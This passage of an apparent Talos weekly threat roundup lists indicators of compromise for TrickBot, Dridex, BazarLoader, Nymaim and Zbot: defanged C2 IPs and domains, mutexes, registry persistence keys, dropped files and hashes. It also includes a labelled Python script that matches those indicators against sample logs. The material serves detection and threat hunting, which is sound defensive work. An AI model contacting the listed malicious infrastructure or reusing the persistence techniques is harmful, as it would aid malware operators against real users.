Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 14 and May 21. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Malware.TrickBot-9861087-1 Malware TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Dridex-9861097-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Malware.BazarLoader-9861103-1 Malware BazarLoader is used to drop follow-on malware on an infected system, most commonly the TrickBot banking trojan or Ryuk ransomware. BazarLoader is named in part because its C2 communications typically go to domain names under the .bazar top-level domain.
Win.Malware.Nymaim-9861140-1 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm (DGA) to produce candidate C2 domains from which it retrieves additional payloads.
Win.Packed.Zbot-9861143-0 Packed Zbot, also known as Zeus, is a trojan that steals information such as banking credentials, using methods including key-logging and form-grabbing.
Win.Downloader.Banload-9861199-0 Downloader Banload is a banking trojan believed to be developed by Brazilian cybercriminals and is used primarily to infect machines in Latin America. One notable aspect of Banload is its use of custom kernel drivers to evade detection.
Win.Packed.Tofsee-9861724-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet.
Win.Packed.Razy-9862528-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, eventually sending it to a command and control (C2) server. Information collected may include screenshots. The samples gain persistence by creating and setting a registry value that auto-executes the malware.
Win.Malware.Zegost-9861320-1 Malware Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.
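
The IOC tables below print every network indicator defanged ("[.]" for ".") with an occurrence count beside it, and a few IP rows are CIDR blocks (for example 194[.]87[.]101[.]6/31) rather than single hosts. The following Python is an added example of consuming that layout for hunting; it is not Talos code and not part of the roundup. The IOC rows are copied from the TrickBot and BazarLoader tables; the log line format, host names and log contents are constructed for the demo. Domains are matched including subdomains, connections are matched by CIDR containment, and the occurrence count travels with each hit so that low-signal matches on public IP-check services (which the tables explicitly say do not indicate maliciousness) can be down-weighted.

```python
"""Parse IOC rows in the roundup's defanged "indicator count" layout and
match them against telemetry.

Added example, not Talos code.  The IOC rows are copied from the TrickBot
and BazarLoader tables; the log lines and their format are constructed
for the demo."""
import ipaddress
import re

# Rows exactly as the page prints them: "<defanged indicator> <occurrences>".
IOC_ROWS = """\
194[.]87[.]92[.]147 6
194[.]87[.]101[.]6/31 2
icanhazip[.]com 6
npf-orbis[.]ru 2
lstalker2game[.]bazaar 16
thegame[.]bazar 15
"""

# Constructed telemetry: one DNS query or one outbound connection per line.
SAMPLE_LOG = """\
2021-05-18T10:01:02Z dns host=WS01 query=icanhazip.com
2021-05-18T10:01:03Z conn host=WS01 dst=194.87.101.7
2021-05-18T10:02:10Z dns host=WS02 query=www.thegame.bazar
2021-05-18T10:02:11Z conn host=WS02 dst=8.8.8.8
2021-05-18T10:03:00Z dns host=WS03 query=example.com
"""

ROW_RE = re.compile(r"^(\S+)\s+(\d+)$")
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<kind>dns|conn) host=(?P<host>\S+) "
    r"(?P<key>query|dst)=(?P<val>\S+)$"
)


def refang(indicator: str) -> str:
    """Undo the page's defanging: '[.]' becomes '.'."""
    return indicator.replace("[.]", ".")


def parse_ioc_rows(text: str):
    """Split rows into (networks, domains).

    networks: list of (ip_network, occurrences).  A row such as
              194[.]87[.]101[.]6/31 is a CIDR block covering two hosts,
              so every IP row is stored as a network (/32 for single hosts).
    domains:  dict of lowercase domain -> occurrences.
    """
    networks, domains = [], {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        value, count = refang(m.group(1)), int(m.group(2))
        try:
            networks.append((ipaddress.ip_network(value, strict=False), count))
        except ValueError:  # not an IP or CIDR, so treat it as a domain
            domains[value.lower()] = count
    return networks, domains


def match_events(log_text: str, networks, domains):
    """Return (host, observed value, matched IOC, occurrences) per hit.

    Connections are matched by CIDR containment; DNS queries match the
    listed domain or any subdomain of it (www.thegame.bazar -> thegame.bazar).
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host, val = m.group("host"), m.group("val").lower().rstrip(".")
        if m.group("kind") == "conn":
            try:
                ip = ipaddress.ip_address(val)
            except ValueError:
                continue
            hits.extend((host, val, str(net), n) for net, n in networks if ip in net)
        else:
            labels = val.split(".")
            for i in range(len(labels)):
                candidate = ".".join(labels[i:])
                if candidate in domains:
                    hits.append((host, val, candidate, domains[candidate]))
                    break
    return hits


if __name__ == "__main__":
    nets, doms = parse_ioc_rows(IOC_ROWS)
    for hit in match_events(SAMPLE_LOG, nets, doms):
        print(hit)
```

Run against the constructed log, the script reports three hits: the icanhazip.com lookup (a public IP-check service, so weak evidence on its own), the connection to 194.87.101.7 inside the listed /31, and the query for www.thegame.bazar, a subdomain of a listed .bazar name. Storing single IPs as /32 networks keeps one code path for both row shapes.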

Threat Breakdown

Win.Malware.TrickBot-9861087-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes | Occurrences
316D1C7871E00 23
738EBAFEEBF832960 1
BFD454C45310128 1
FE987D7EF5F832960 1
AD793940E5000 1
90B218BE62F832960 1
FFB9185061400 1
1F87A966A59832960 1
953EF270C9C00 1
49621BFE6FF832960 1
42C2F870E1C00 1
FF7AE18086000 1
1393994E653832960 1
0E48F9F2E7C832832 1
9909A2888A200 1
9E13052C14B0128 1
D3BAACFEB3F832960 1
5314CA12284832832 1
B4F41EC07B000 1
CF01200A802832832 1
BBEA15D45750128 1
87014DD6375832960 1
D9028B982E600 1
9BD9819006400 1
E32439AAE6A832832 1

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
34[.]117[.]59[.]81 6
194[.]87[.]92[.]147 6
116[.]203[.]16[.]95 5
95[.]217[.]228[.]176 5
104[.]22[.]18[.]188 4
149[.]154[.]68[.]252 4
62[.]109[.]6[.]188 3
94[.]250[.]250[.]112 3
62[.]109[.]2[.]172 3
95[.]213[.]237[.]223 3
82[.]146[.]61[.]187 2
92[.]63[.]97[.]68 2
87[.]236[.]16[.]231 2
23[.]21[.]48[.]44 2
172[.]67[.]9[.]138 2
23[.]96[.]30[.]229 2
92[.]53[.]78[.]74 2
194[.]87[.]101[.]9 2
194[.]87[.]94[.]108 2
92[.]53[.]77[.]44 2
92[.]53[.]78[.]71 2
89[.]67[.]149[.]48 2
92[.]53[.]66[.]151 2
194[.]87[.]101[.]6/31 2
216[.]239[.]32[.]21 1

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
icanhazip[.]com 6
wtfismyip[.]com 5
ip[.]anysrc[.]net 5
checkip[.]amazonaws[.]com 4
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 4
api[.]ipify[.]org 4
ipinfo[.]io 2
checkip[.]us-east-1[.]prod[.]check-ip[.]aws[.]a2z[.]com 2
myexternalip[.]com 2
npf-orbis[.]ru 2
ipecho[.]net 1
Files and/or directories created | Occurrences
%APPDATA%\services\client_id 25
%APPDATA%\SERVICES\<original file name>.exe 25
%System32%\Tasks\services update 23
%APPDATA%\services\Modules 23
%APPDATA%\services\group_tag 23
%APPDATA%\services 23
%APPDATA%\services\0aa3bead95550842076a37g064a7e87247g09e3775767d5978d7a75778607266.exe 1
%APPDATA%\services\06g296736ff2a472fd70777gf757edd53788dg8ae23a66feee7a9d6247f69aab.exe 1
%APPDATA%\services\2482ed84bge76a7a73f64090b408be4bbbe3g8d8f56e0fb36ad5fdf86eff700d.exe 1
%APPDATA%\services\44b6255bd52737780fe9f73f5555257707g333776b87d4e57ff074g598087gef.exe 1
%APPDATA%\services\4277b8b9a4ef794e80b289fbd9763a002d0879790d77gb06eab5g87a7de9bg45.exe 1
%APPDATA%\services\6ed6970eddbd7a45b9e8e38d7f486250ba0e225453fd2bb84775g8e9374ag4b8.exe 1
%APPDATA%\services\7ed783g7g7g2465b6b683885bd77523772b0gdegd2ea93g84a5a45d70a8de590.exe 1
%APPDATA%\services\a6b73f686gf7g820d3904e7ee096de277eb6d6g8af3ge2579gb64e5d7g662995.exe 1
%APPDATA%\services\28e2387gb866680d969de7202932470ee76f972ad92dd47f595ef6309ea236g0.exe 1
%APPDATA%\services\5840532ag77707a5762a3098e99e2d30258498g3f5dbee3724620f97b8567b73.exe 1
%APPDATA%\services\242aa9agg35e6a7d3e70a07ad9eb7ee3eb54054a6efe263b85ee629686f375e4.exe 1
%APPDATA%\services\78e8bd6774829g2790976ae468687767f9f7bb7g3a27b64bg4254bb02da7f776.exe 1
%APPDATA%\services\aagb0365568b440776e0bd9944062f5f32666587377fg0349592696db3ag0de6.exe 1
%APPDATA%\services\ae5868d7735f5db874gddf2a86b653f60479b846g37dd877ebbfdag54f30696a.exe 1
%APPDATA%\services\a2da0eg24f279e5470735g47g7a7762d56da9gb557ff55gbe0g9f3383g4f7daa.exe 1
%APPDATA%\services\4e2089fe07gaf45df77e724938g325def7420a8e5a394f6a278a5g93daab7826.exe 1
%APPDATA%\services\be3748edgg6gdf98e7a68f5d6ae23b88484a335e7ba769d29abdff9g04gg568d.exe 1
%APPDATA%\services\0dd75f85ba576a26gb37df38g86633ge99d2g299fda292595aabfg4a04f6g7ed.exe 1
%APPDATA%\services\252de9g288g0950ab3g855f25g32594f942244a5847af3224bb4f0ade8b5a52f.exe 1

*See JSON for more IOCs

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9861097-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
15
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 15
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]12[.]142 15
104[.]23[.]99[.]190 9
172[.]217[.]197[.]113 6
104[.]23[.]98[.]190 6
23[.]3[.]13[.]88 6
172[.]217[.]197[.]100/31 6
172[.]217[.]197[.]138/31 4
72[.]21[.]81[.]240 3
172[.]217[.]197[.]102 3
173[.]194[.]207[.]113 2
173[.]194[.]175[.]94 2
173[.]194[.]207[.]94 2
209[.]85[.]201[.]94 2
209[.]85[.]144[.]104/31 2
205[.]185[.]216[.]42 1
172[.]217[.]197[.]132 1
209[.]85[.]201[.]101 1
8[.]249[.]233[.]254 1
209[.]85[.]201[.]113 1
173[.]194[.]207[.]84 1
23[.]21[.]48[.]44 1
173[.]194[.]135[.]102 1
92[.]53[.]78[.]74 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
pastebin[.]com 15
w[.]google[.]com 15
www3[.]l[.]google[.]com 15
cs11[.]wpc[.]v0cdn[.]net 3
www[.]tf6hb6lgxp[.]com 1
www[.]2rj2le7eup[.]com 1
www[.]rtcolspuut[.]com 1
www[.]bzc5wf2n9s[.]com 1
www[.]zjxtx6gcdz[.]com 1
www[.]i0a22eufx0[.]com 1
www[.]3yfxpn5aoa[.]com 1
www[.]mqlhvoj9cr[.]com 1
www[.]aw0curgluw[.]com 1
www[.]piwsarbgqj[.]com 1
www[.]trvy6jf3vp[.]com 1
www[.]gi2nl0uepw[.]com 1
www[.]lzch7hv9aa[.]com 1
www[.]dvkehx8niy[.]com 1
www[.]dqdihx9ddf[.]com 1
www[.]rvuxzg4tcf[.]com 1
www[.]9mc82bxk1z[.]com 1
www[.]gjbofjdyny[.]com 1
www[.]aj1xfcn7qr[.]com 1
www[.]kvzvvm56x7[.]com 1
www[.]u4wn6yp6pb[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 15
\Temp\HncDownload\Update.log 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\HncCheck.exe.log 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl 1

File Hashes

004ed482c5833663b462f2e58c0688c7ffd78a6a338bdb077c71fdb828d7e12a
13a3b51e4012da6bb2a5a62b85c69cec81dc6dc50830bb4ff4216717c2041e23
2b5c62e7f804eb82808105c7203f26aec0f58e94db8ca4a7c575998fded5d560
2df959c9c17b548ae48657e028c19626f875d095d2fbc73852bb16c436b7dc35
2e520da78e72564d7a44252d58fc3df0add1d2271b9df3134ffca7806247887a
49befa3ce7b9f67cd29131e4da155e7d2e937f7f6f675ec96228b65881073a6a
4e3838ab1c8199a5b242d1f08231ae4ababe69dab1c54c49dd7e7c3da37fd53f
517449257fbdf8e331d3c7023b7700a411cb573603086c5b3fe331a0f1581cfe
67f0b9b34c03bee7e5eeac2eba0201af3ce37bff2a6d539536e6013c0a8310be
9562c05766567b8ace11e1543f1e31444c9110615ea3ed9882bc8526ce749af1
bf1e5bccf528ed852f6814e21841c7e3d431badd8b6ed6c2f9690f45a7ab5683
c571a219c4024dafd6e2db63262edaff393e7f6559ea90b91f0730a4e8741c0f
c7295ae189b94b5388eb657009e99b1272aff78efb2fcc688a86e80aafa1ae7c
ccd951eec041a9addf5cbde4d7953918a7961298574e011365afc4e861d0302b
d941fdd39e9b41db64073cd94c32e222cc6633a112524282043897ccb74f3a45

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.BazarLoader-9861103-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Skyре
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Skyре Remote Control
3
Mutexes | Occurrences
2020_ld_id_20_07 18
2020_child_id_20_07 18
Global\19e2efa1-b35f-11eb-b5f8-00501e3ae7b6 1
Global\c2face21-b40c-11eb-b5f8-00501e3ae7b6 1
Global\43743321-b467-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
94[.]247[.]43[.]254 16
172[.]98[.]193[.]42 16
116[.]203[.]98[.]109 16
194[.]36[.]144[.]87 16
165[.]22[.]224[.]164 16
34[.]221[.]188[.]35 16
172[.]98[.]193[.]62 16
45[.]76[.]254[.]23 16
198[.]50[.]135[.]212 16
195[.]123[.]240[.]6 14
78[.]108[.]216[.]13 14
220[.]32[.]32[.]128 14
194[.]5[.]249[.]163 14
80[.]82[.]68[.]132 14
62[.]108[.]35[.]215 14
31[.]214[.]240[.]203 14
72[.]21[.]81[.]240 5
172[.]104[.]136[.]243 2
91[.]217[.]137[.]37 2
163[.]53[.]248[.]170 2
104[.]37[.]195[.]178 2
31[.]171[.]251[.]118 2
45[.]71[.]112[.]70 2
163[.]172[.]185[.]51 2
92[.]222[.]97[.]145 2

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
api[.]opennicproject[.]org 16
lstalker2game[.]bazaar 16
lrusstalker2game[.]bazaar 16
lbesthlalyxgame[.]bazaar 15
thegame[.]bazar 15
255[.]255[.]2[.]49 14
lbesthl3alyxgame[.]bazaar 14
lrusalyxbestgame[.]bazaar 10
api[.]opennic[.]org 9
lbeststalkergame[.]bazar 9
lbeststalkergame[.]bazaar 7
lstalker2game[.]bazar 7
lrusstalker2game[.]bazar 6
cs11[.]wpc[.]v0cdn[.]net 5
lbesthlalyxgame[.]bazar 5
lbesthl3alyxgame[.]bazar 3
lrusalyxbestgame[.]bazar 2
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 1
defiildlhiio[.]bazar 1
aeehjkalghjn[.]bazar 1
eeehjlelghjo[.]bazar 1
afeijlamgijo[.]bazar 1
cfgiimcmiiip[.]bazar 1
Files and/or directories created | Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Control Panel.lnk 18

File Hashes

0615fc83f0a4a9abcf7b8285393d2903caf7925cd17d13e9a2f5864159e05e06
1010df3a366d64585c663d980edce786c19c94f20d912a72e05f2e060b17e482
2014e44bbaff8abefaa0f6a251c9810cd77e3f109f6ec9f4d121a6dfc3fe462c
231fd44326052d67dbbd79505ee5ed4a9130ba21b65c716fc7005027ea661dfc
25f32f90267585144c1e6e02867d2f72eb0e486e338755d9e6ccee3d72b446f1
3f7aa85550b112941e3e20b4dfb54fd1773d906bf5650a8107e49bdf731e3da6
4989dd9933ef037b19e95056874e752eca54291a1bcde157009a0e3d25597672
61bcf8fe872b4a560ca0781191615328f3482f52076c7b7b0e8f6103e9b7eb0e
6a500001a199b63d3e1c91603437de2d4c5e955d02df4299952f4182caef58a5
70c85fe73ad6060e5c20219911f2ce470daa646c302cea3a1bbd1278dc505e25
743f51ed08338910f2cd162c8c3b34eb42abbebea8c33502de36b8589779901b
7955aaca8bb62eeb5e36a17da77db7e3c9c77d3087f9a6607062523700e7ef83
8203a7b1dda88e2a4d0ac7c7ac6759515ed4d93f577c10b638e8a1878f05676c
84c3cc9c6b87138eaabeac5c2c51e2e890a17ec709f12a84a2bb765e552af84e
863f65a20c08c5aa58ef0dc5d1fda40f7885edb52e8516fb5a5d73966fc3d9bc
903c71bd86fa2699cb116a4228254ed7cecd6d23d1882038aa2c3c9764ca8240
90e716b63e960cf4b0aa27a2a84e28ddae1d6be369d0999c26a83a7391b81e8b
9566adced6b79a20beb1833f098c01e6117070a91559517118be515e3f5e0bea
9b20cb8130624aa9a02c8624b94f08f1fa1699b9b84ba7befe1c60ff85e4a829
a472dccc31ae682ed3a8d1f4f8254994fbaa7e81ce31ac61178b934499140a01
ab1da24b1b72dd8aa01b1cf67a071cbf9946dd5277dc7efe97aec43c7be61997
b4c28387b8574222f312657db88eaa1f2ee7f460821f717b92bd8ad1823c2684
ca3527076105e4a267b01cac3703265fe8e65a9d14b4fcacb24a73e9d9d9cba8
d488214860d46b5c97a199a352a2332f1f410f451c49bea55050744fe1a6082e
d78f119bb411796d40d74b6109260ed07fd496662bc28a7deff0a58b8ecba96c

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Nymaim-9861140-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 25
<HKCU>\SOFTWARE\MICROSOFT\KPQL 25
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
25
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp
25
Mutexes | Occurrences
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 25
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 25
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 25
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 25
Local\{B13D69F8-F0AA-A818-5093-74D6601607EE} 25
Local\{364979D3-CCFF-AEC0-03C9-4C6906B10346} 25
Local\{03D09EE6-3557-A6E4-5B03-5D5396702DDB} 25
Local\{43F69760-02CF-44A1-F90D-A342560A0D9F} 25
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
mjcvb[.]in 25
vnhpqbkwgh[.]com 25
zrhniegwylrs[.]pw 25
kqlxsala[.]in 25
rdvtg[.]com 25
lnntjxfqxh[.]net 25
caezvdor[.]in 25
lfxkysr[.]pw 25
rtgddpedtts[.]pw 25
knqblbzpx[.]com 25
fwmpxkwb[.]in 25
grszyndf[.]com 25
ivguyoatfkv[.]net 25
xmhicesjip[.]pw 25
vnkeculmkee[.]net 25
wgbvouu[.]net 25
yizbwryt[.]in 25
ixrdcv[.]net 25
ovcqyq[.]pw 25
janoglhwa[.]net 25
plndtmb[.]in 25
gctdhul[.]com 25
tyszy[.]net 25
uhawkmyyqufa[.]pw 25
ckaambwsv[.]com 25

*See JSON for more IOCs

Files and/or directories created | Occurrences
%ProgramData%\ph 25
%ProgramData%\ph\eqdw.dbc 25
%ProgramData%\ph\fktiipx.ftf 25
%TEMP%\gocf.ksv 25
%TEMP%\kpqlnn.iuy 25

File Hashes

04ee8e1477707e4a89a26c2e6d3e666a376991fbdc2d4b91ee23748d718409b5
0f5d38c78a7e076b71dd4dc638246ff379870d4dd1ca2cf1901206142eb17a19
102ae22bd9873dfa304a851b29a0d23ada7134216ae970fa91241f3185ae0f13
12e87ec19462eccb40fd9f302a880158bad117bf8de1d879f72af0d43276d5d1
161f5d271f422089b3157e810da89aec7af7342984bae8d3946aaf84998073b2
1942a66e4d1ee8ef82747715f6be8d90508e2055e5f2d13b0277fd8177025157
1ee175c87de46075d08c8222aca2814b60096e6c8aff431d0e77dae31f4cf1f7
2a9ea7dc9a3af5ba258fd8000150f1f4be02a0e051c89f2c984c1da6a0e9bbea
36ea672db90a6687539744aeb2e2235266251d9b85f6bc73cb1e1ff6f23535b3
3701ae7b2f8dd6e0b012c369439734b895fdd53534718a226929b957728374fe
3c33c6f582c2cb89f06818a654d6768b1146b91f729f239fb9ae8c37fd3931a5
3dab3bcd66fccc39ba78c202ad6d8f25ac8d2cf81e077b6467e7332d8e8e9a95
4b4b5f9b72f956726dfc18d7fcc98a8441b2089a0e465b42f4f8ad12f167b23f
4e4554a081601900eef39a5f29a54f792cc6c0520099c927d213b5ec7ef14be3
505b184f1785ebe21d1ffd33422405ec0e5a2df2f41ddda25d0af8958bb1bda3
547ef2b56fd1564b6dec8b1212295e29d963986efcdec09a16ed99218057872a
5c22e440e2f0fdba49d0b62e942e082a89092c57f3ef613ac91d296364180afa
5d2f538c27bd4778ad86d94d2ee509aed9663ebaffa56158836047fb8efb79a8
64900df157a4cd4eb7f64956caa9f975cbe7615b7d1edad28d6e88ed7689db5a
661f317e6760525e3797320f789c91717b777c0ca80dae4c2cceec518ea9a0dd
6ccde75dc6c867bfb92cf2055a9d942540006382f69504fec60225c5f3f95afc
79af100c65d8819ba93cd18183d39f29907079c86114d0cd5d68cda6f3b84b63
7fa094e5efe49f4c20659d69e9126a3dece94b65227648bb1191d5c32fc224bb
801a68ca9867f2ad90f3c28dabc2ea313eabad149250d2deb7072002f5617cb9
8137703107aecbeb705fe4eeabcd390f2baf58819777b8c48355844a50dfefb1

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Zbot-9861143-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
3
<HKCU>\SOFTWARE\WINRAR 3
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
3
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
3
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
3
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\5F3B8CF2F810B37D78B4CEEC1919C37334B9C774
Value Name: Blob
2
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5158F64FC7C749103980F85FAAC40EE22BCA870B 2
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5158F64FC7C749103980F85FAAC40EE22BCA870B
Value Name: Blob
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ruslobofludo
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: AppManagement
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: ruslobofludozap
2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 1
<HKCU>\SOFTWARE\MICROSOFT\NAYP 1
\RUN 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 36412
1
<HKCU>\SOFTWARE\MICROSOFT\BATACA 1
<HKCU>\SOFTWARE\MICROSOFT\COXAY 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Negiwey
1
<HKCU>\SOFTWARE\MICROSOFT\BATACA
Value Name: Giub
1
Mutexes | Occurrences
GLOBAL\{<random GUID>} 4
Local\{<random GUID>} 4
ruslobofludo 2
2562100796 1
lol 1
1349173324 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
184[.]168[.]131[.]241 3
198[.]185[.]159[.]144/31 2
198[.]49[.]23[.]144/31 2
157[.]7[.]184[.]19 2
103[.]18[.]109[.]167 2
210[.]140[.]168[.]57 2
51[.]178[.]156[.]9 2
49[.]212[.]235[.]209 2
149[.]56[.]111[.]2 2
91[.]136[.]8[.]130 2
35[.]177[.]71[.]77 2
91[.]210[.]232[.]251 2
121[.]122[.]15[.]234 2
204[.]213[.]246[.]21 2
175[.]207[.]13[.]31 2
79[.]99[.]167[.]43 2
85[.]214[.]146[.]173 2
169[.]62[.]11[.]219 2
207[.]55[.]98[.]4 2
183[.]181[.]98[.]115 2
185[.]68[.]110[.]198 2
217[.]115[.]118[.]56 2
89[.]161[.]181[.]123 2
148[.]81[.]111[.]98 2
34[.]72[.]197[.]182 2

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
ans-service[.]com 2
ginalimo[.]com 2
trenpalau[.]com 2
aipi[.]co[.]nz 2
cbsprinting[.]com[.]au 2
coop[.]nl 2
youjoomla[.]com 2
saios[.]net 2
acicinvestor[.]ca 2
www[.]e-storming[.]com 2
victoria[.]com[.]pl 2
thesergery[.]com 2
meprot[.]com 2
